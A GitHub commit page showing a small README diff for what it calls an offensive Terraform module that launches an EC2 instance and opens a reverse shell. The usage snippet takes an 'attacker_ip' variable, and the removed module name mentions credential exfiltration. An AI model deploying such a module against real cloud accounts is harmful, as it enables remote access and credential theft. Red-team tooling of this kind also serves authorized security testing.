Skip to content

Commit efbfd66

Browse files
committed
Fix usage module name
1 parent 1a8cb20 commit efbfd66

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

README.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -10,12 +10,12 @@ Offensive Terraform module which creates EC2 instance and reverse shell from an
1010

1111
## Usage
1212
```
13-
module "ec2_instance_credential_exfiltration" {
13+
module "ec2-instance-reverse-shell" {
1414
source = "offensive-terraform/ec2-instance-reverse-shell/aws"
1515
1616
subnet_id = "subnet-0a4a1cc04"
1717
attacker_ip = "0.0.0.0"
1818
}
1919
```
2020
## Author
21-
Module managed by https://github.com/iganbold
21+
Module managed by https://github.com/iganbold

0 commit comments

Comments
 (0)